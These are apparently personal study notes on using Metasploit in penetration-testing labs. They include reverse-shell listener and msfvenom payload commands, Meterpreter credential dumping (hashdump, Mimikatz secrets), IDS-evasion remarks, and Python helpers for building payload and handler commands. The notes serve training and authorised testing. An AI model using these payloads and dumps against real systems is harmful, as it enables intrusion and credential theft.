#meta #metasploit

## Usage

```shell
# find a module by keyword, then load it by its full path
msf6 > search exploit <exploit name>
msf6 > use <path to exploit>
# list the module's options; anything marked "yes" in the Required column must be set
msf6 > show options
# set an option value, then run the module
msf6 > set <option name> <value>
msf6 > exploit

# narrow a search with filters (type, platform, CVE year, rank, free-text keyword)
msf6 > search type:exploit platform:windows cve:2021 rank:excellent microsoft

# setg sets an option globally: it carries over into every module loaded afterwards
# until msfconsole exits (`save` writes the datastore to ~/.msf4/config to keep it across restarts)
msf6 > setg RHOSTS 10.10.10.40

# pick a specific target (OS/version/arch) from the module's `show targets` list
msf6 > set target <index>
```

[[Payloads Explained#Metasploit]]

### Listener for Reverse Shells

```shell
msf6 > use exploit/multi/handler
# PAYLOAD must match what was generated and delivered exactly: same arch, same
# staged/stageless variant, same transport. Otherwise the callback arrives but no session opens.
msf6 > set PAYLOAD windows/x64/meterpreter/reverse_tcp
# LHOST accepts an interface name in place of an IP
msf6 > set LHOST tun0
msf6 > set LPORT 1234
# -j runs the handler as a background job so the console stays usable
msf6 > exploit -j
```

### File Locations

```shell
/usr/share/metasploit-framework/modules
/usr/share/metasploit-framework/scripts/
/usr/share/metasploit-framework/tools/
```

## Create Workspace

```shell
# start the PostgreSQL database and launch msfconsole connected to it
sudo msfdb run

# create a workspace for this target and switch to it
msf6 > workspace -a Target_1

# run nmap from inside msfconsole; results are stored in the current workspace
msf6 > db_nmap -sV 10.10.10.40

# query what has been collected so far
msf6 > hosts
msf6 > services
msf6 > creds
# loot lists captured files (hash dumps, config files) per host; together with the
# three commands above it gives an at-a-glance list of owned hosts, services and users
msf6 > loot
```

## Encode

`msfpayload` and `msfencode` were removed from the framework in 2015; `msfvenom` replaces both. Encoding rewrites the payload so that it contains none of the listed bad characters (here the NUL byte, which would truncate the payload wherever it is copied as a C string). It is not an AV bypass: `x86/shikata_ga_nai` output in particular is widely signatured.

```shell
# legacy form (no longer available):
#   msfpayload windows/shell_reverse_tcp LHOST=127.0.0.1 LPORT=4444 R | msfencode -b '\x00' -f perl -e x86/shikata_ga_nai
# current equivalent: -p payload, -b bytes that must not appear in the output, -e encoder, -f output format
msfvenom -p windows/shell_reverse_tcp LHOST=127.0.0.1 LPORT=4444 -b '\x00' -e x86/shikata_ga_nai -f perl
```

### Plugins and Meterpreter Extensions

- [nMap (pre-installed)](https://nmap.org)
- [NexPose (pre-installed)](https://sectools.org/tool/nexpose/)
- [Nessus (pre-installed)](https://www.tenable.com/products/nessus)
- [Mimikatz (pre-installed V.1)](http://blog.gentilkiwi.com/mimikatz)
- [Stdapi (pre-installed)](https://www.rubydoc.info/github/rapid7/metasploit-framework/Rex/Post/Meterpreter/Extensions/Stdapi/Stdapi)
- [Railgun](https://github.com/rapid7/metasploit-framework/wiki/How-to-use-Railgun-for-Windows-post-exploitation)
- [Priv](https://github.com/rapid7/metasploit-framework/blob/master/lib/rex/post/meterpreter/extensions/priv/priv.rb)
- [Incognito (pre-installed)](https://www.offensive-security.com/metasploit-unleashed/fun-incognito/)
- [Darkoperator's](https://github.com/darkoperator/Metasploit-Plugins)

```shell
# inside a Meterpreter session; hashdump reads the SAM and needs SYSTEM (run getsystem first)
meterpreter > hashdump
# lsa_dump_secrets is a kiwi (Mimikatz 2.x) extension command, so load the extension first
meterpreter > load kiwi
meterpreter > lsa_dump_secrets
```

## MSF - Loading Additional Modules

```shell
# after copying a new module into the modules tree (or ~/.msf4/modules), load the directory
loadpath /usr/share/metasploit-framework/modules/
```

Alternatively, launch `msfconsole` and run `reload_all` so that the newly installed module appears in the list. Once the command returns without errors, either `search [name]` for it inside `msfconsole` or `use [module-path]` directly to jump straight into it.

```shell
msf6 > reload_all
msf6 > use exploit/unix/webapp/nagios3_command_injection
```

```shell
# suggests local privilege-escalation exploits for an existing session (id from `sessions -l`)
msf6 > search local_exploit_suggester
msf6 > use post/multi/recon/local_exploit_suggester
msf6 > set SESSION 1
msf6 > run
```

## Firewall and IDS/IPS Evasion

Evading signature-based detection of the payload file itself: [[MSF-VirusTotal]]

On the network side, since the MSF6 release Meterpreter session traffic is AES-encrypted between the victim and the attacker host, so its content no longer matches payload or protocol signatures on the wire. That defeats content-inspecting network IDS/IPS rules, but not traffic analysis: the destination host and port, the timing and volume of the connection, and anything host-based AV/EDR sees before the payload ever talks to the network are unchanged.

## Engagement Structure

The MSF engagement structure can be divided into five main categories:

- Enumeration
- Preparation
- Exploitation
- Privilege Escalation
- Post-Exploitation

![[S04_SS03.png]]
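Tying the Listener for Reverse Shells and Encode sections together: the usual reason a handler shows a connection but no session is that the payload `msfvenom` generated and the one `multi/handler` expects differ (staged vs stageless name, LHOST, LPORT). The following is an added example, not code from this note or from the Metasploit project. It derives the `msfvenom` argv and a matching resource script for `msfconsole -q -r handler.rc` from one parameter set, and `mismatches()` checks an existing pair. The host, port and payload values are hypothetical.

```python
"""Keep the msfvenom payload and the multi/handler listener in sync.

Added example, not code from this note or from the Metasploit project. One
parameter set produces both the msfvenom argv and a handler resource script,
and mismatches() checks an existing pair for the usual reasons a callback
arrives but no session opens. Host, port and payload names are hypothetical.
"""
import re
import shlex

HANDLER_TEMPLATE = """\
use exploit/multi/handler
set PAYLOAD {payload}
set LHOST {lhost}
set LPORT {lport}
set ExitOnSession false
exploit -j -z
"""


def msfvenom_argv(payload, lhost, lport, fmt="exe", badchars=None, encoder=None, out=None):
    """Build the msfvenom command as an argv list, so shell quoting cannot mangle it."""
    argv = ["msfvenom", "-p", payload, f"LHOST={lhost}", f"LPORT={lport}", "-f", fmt]
    if badchars:
        argv += ["-b", badchars]  # bytes that must not appear in the output
    if encoder:
        argv += ["-e", encoder]
    if out:
        argv += ["-o", out]
    return argv


def handler_rc(payload, lhost, lport):
    """Render the handler resource script that matches msfvenom_argv()'s parameters."""
    return HANDLER_TEMPLATE.format(payload=payload, lhost=lhost, lport=int(lport))


def parse_msfvenom(cmd):
    """Pull payload/LHOST/LPORT out of a msfvenom command (string or argv list)."""
    argv = shlex.split(cmd) if isinstance(cmd, str) else list(cmd)
    info = {}
    for i, tok in enumerate(argv):
        if tok in ("-p", "--payload") and i + 1 < len(argv):
            info["payload"] = argv[i + 1]
        elif "=" in tok:
            key, val = tok.split("=", 1)
            if key in ("LHOST", "LPORT"):
                info[key.lower()] = val
    return info


def parse_handler_rc(text):
    """Pull PAYLOAD/LHOST/LPORT out of a resource script (set and setg lines)."""
    info = {}
    for line in text.splitlines():
        m = re.match(r"\s*setg?\s+(\S+)\s+(.+?)\s*$", line)
        if m and m.group(1).upper() in ("PAYLOAD", "LHOST", "LPORT"):
            info[m.group(1).lower()] = m.group(2)
    return info


def mismatches(cmd, rc_text):
    """Return human-readable mismatches between a msfvenom command and a handler rc.

    Empty list means the pair is consistent. A handler LHOST of 0.0.0.0 is a
    wildcard bind and is accepted whatever address the payload calls back to.
    Values are compared literally, so an interface name (tun0) on one side and
    its IP on the other is reported and needs a human look.
    """
    a, b = parse_msfvenom(cmd), parse_handler_rc(rc_text)
    problems = []
    for key in ("payload", "lhost", "lport"):
        if key == "lhost" and b.get("lhost") == "0.0.0.0":
            continue
        if a.get(key) != b.get(key):
            problems.append(f"{key}: msfvenom={a.get(key)!r} handler={b.get(key)!r}")
    return problems


if __name__ == "__main__":
    payload, lhost, lport = "windows/x64/meterpreter/reverse_tcp", "10.10.14.5", 4444
    print(shlex.join(msfvenom_argv(payload, lhost, lport, out="rev.exe")))
    print(handler_rc(payload, lhost, lport))
```

Write the rendered script to a file and start the listener with `msfconsole -q -r handler.rc`; `ExitOnSession false` with `exploit -j -z` keeps the handler up for multiple callbacks.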
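What the `-b '\x00'` flag in the Encode section asks an encoder to do, reduced to its simplest form, as an added example that is not code from this note or from the framework: a single-byte XOR encoder that searches for a key such that neither the encoded bytes nor the key itself (which a decoder stub has to carry as an immediate) contains a forbidden byte. `x86/shikata_ga_nai` is a polymorphic additive-feedback XOR encoder and does far more than this, but it solves the same constraint. `SAMPLE` is a constructed byte string standing in for shellcode, not real shellcode; the function names are this example's own.

```python
"""Bad-character avoidance with a single-byte XOR key.

Added example, not code from this note or from Metasploit. SAMPLE is a
constructed stand-in for shellcode. find_key() shows the constraint an encoder
solves and encode() shows where the single-byte scheme gives up.
"""
from typing import Optional, Tuple

SAMPLE = b"\x00\x01\x02\xff\x00\x41\x42\x0a"  # constructed: contains NUL and LF
BAD_DEFAULT = b"\x00"


def xor_bytes(data: bytes, key: int) -> bytes:
    return bytes(b ^ key for b in data)


def has_bad(data: bytes, bad: bytes) -> bool:
    """True if any forbidden byte value appears in data."""
    return any(b in bad for b in data)


def find_key(data: bytes, bad: bytes) -> Optional[int]:
    """First single-byte key whose output avoids every bad byte, or None.

    Keys that are themselves bad bytes are skipped: the decoder stub embeds the
    key as an immediate, so such a key would put the bad byte straight back.
    """
    badset = set(bad)
    for key in range(1, 256):  # 0 is the identity transform, never useful
        if key in badset:
            continue
        if not any((b ^ key) in badset for b in data):
            return key
    return None


def encode(data: bytes, bad: bytes = BAD_DEFAULT) -> Tuple[int, bytes]:
    """Return (key, encoded bytes).

    Raises when no single-byte key works. With bad = NUL that is guaranteed as
    soon as the input contains every byte value 1..255, because b ^ key == 0 for
    the b equal to key; a multi-byte or feedback scheme is needed instead.
    """
    key = find_key(data, bad)
    if key is None:
        raise ValueError("no single-byte XOR key avoids the bad chars")
    return key, xor_bytes(data, key)


def decode(encoded: bytes, key: int) -> bytes:
    """What the decoder stub does at run time before jumping into the payload."""
    return xor_bytes(encoded, key)


if __name__ == "__main__":
    key, enc = encode(SAMPLE, b"\x00\x0a")
    print(f"key=0x{key:02x} encoded={enc.hex()} round_trip_ok={decode(enc, key) == SAMPLE}")
```

The failure case is the instructive part: a payload that already uses every byte value cannot be made NUL-free by one XOR key, which is why real encoders chain per-block keys and feedback, and why `msfvenom` sometimes reports that an encoder failed for a given bad-character set.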